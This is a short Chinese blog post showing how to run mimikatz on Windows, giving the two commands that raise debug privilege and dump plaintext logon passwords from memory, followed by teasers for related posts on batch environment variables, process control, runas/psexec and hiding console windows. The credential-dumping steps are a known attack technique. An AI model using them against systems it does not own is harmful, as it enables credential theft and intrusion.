使用mimikatz读取windows密码

发表于2021-07-05|更新于2025-06-20|Windows

|浏览量:

mimikatz 是一个小工具，可以查看到 windows 加载进内存的密码数据，首先最起码要使用 Administrator 权限启动

依次执行：

从 administrator 提升到 system

1	privilege::debug

获取明文密码

1	sekurlsa::logonpasswords

文章作者: 张理坤

文章链接: https://zahui.fan/posts/a80bd06b/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源杂烩饭！

相关推荐

Windows下使用bat脚本来新增环境变量

自己创建了一个 bin 目录用于存放一些 exe 或者 bat 用于快速调用, 把它加到 PATH 环境变量中就可以在任意路径来调用了. 查看环境变量1set PATH 设置环境变量1setx PATH "%PATH%;%USERPROFILE%\bin" 这里需要注意把原有的 %PATH% 带上, 不然就会覆盖掉 PATH 变量, %USERPROFILE% 指的是个人文件夹, 我的就是 C:\Users\iuxt 完整脚本首先判断一下有没有环境变量, 没有的话就增加, 有的话什么都不做. 123456set path | findstr "%USERPROFILE%\bin" >nul && ( echo 环境变量已存在) || ( echo 环境变量不存在 setx PATH "%PATH%;%USERPROFILE%\bin")

Windows使用命令操作进程

查找进程1tasklist | findstr xxx 根据进程名杀进程1taskkill /F /IM npc.exe 根据进程 PID 杀进程1TASKKILL /PID 1230 /PID 1241 /PID 1253 /T

Windows命令行使用其他用户身份运行

比如说我一个脚本使用管理员权限运行，那么它调用的其他程序默认都是以管理员权限运行的。我想要以普通用户程序来运行，有以下几种方法： runas 方式指定权限运行0x20000 是标准用户权限0x40000 是管理员权限 1runas /trustlevel:0x20000 "wt.exe" 这种方式我测试会造成 wsl 报错“UtilTranslatePathList” 指定用户执行1runas /user:iuxt wt.exe" 这种方式会弹窗让你输入密码（每次） psexecpsexec 是微软官方的一组小工具：https://learn.microsoft.com/zh-cn/sysinternals/downloads/psexec 需要用到里面的 psexec64.exe 然后调用此工具。 1psexec.exe -u iuxt -p YourPassword C:\Path\To\wt.exe 缺点：需要在命令行指定用户名和密码（有安全隐患）运行的时候会有个黑框框一闪而过，并且第一次启动会有个窗口，需要点一下 agree

Windows系统隐藏文件

attrib 命令这个只是隐藏, 并没有把文件加密 1attrib +S +H <文件或文件夹> 优点: 不用加密解密, 访问简单缺点: 不安全创建 vhd 并使用 bitlocker在磁盘管理里面创建 vhd 磁盘, 挂在好后使用 BitLocker 加密 (可选) 优点: 数据安全,没有密码无法解密缺点: 容易损坏,造成数据全部丢失使用第三方加密软件略使用压缩软件加密略

Windows隐藏cmd运行窗口

使用开源软件实现 (推荐) hidecon.exe 官网地址使用方法，将 hidecon.exe 和其他可执行放在一块，在 bat 脚本前面加上 12hidecon.exenpc -server=xxx:8888 -vkey=xxxxxxxxxxxxxxxx -type=tcp 使用 vbs 实现（推荐）1CreateObject("WScript.Shell").Run "D:\syncthing\syncthing.exe",0 或者批量运行： 1234Set ws = CreateObject("Wscript.Shell")ws.run "cmd /c start 1.exe",vbhidews.run "cmd /c start 2.exe",vbhidews.run "cmd /c start 3.exe",vbhide 复制保存成 vbs 文件即可。使用 cmd 实现（会有一闪而过的黑窗）12345@echo offif...

bat命令修改windows环境变量

在 bat 下修改环境变量有几种方式, 比如 set setx vmic ENVIRONMENT setwindows 的 set 和 bash 里面直接赋值类似, 只在当前脚本中生效, 比如 1234set a=becho %a%b setxsetx 和 set 类似, 不一样的是 setx 会把设置持久化保存起来 1setx a c 因为 setx 直接将环境变量保存在注册表中, 所以 cmd 终端需要关闭重新打开才能生效 12echo %a%c 后续就算重启电脑, 也会生效, 不过数据量比较大的时候会报错： WARNING: The data being saved is truncated to 1024 characters，最终修改的内容也是不完整的。所以不建议使用 vmicwmic 常用命令1234567891011# 创建系统变量wmic ENVIRONMENT create...

评论

数据加载中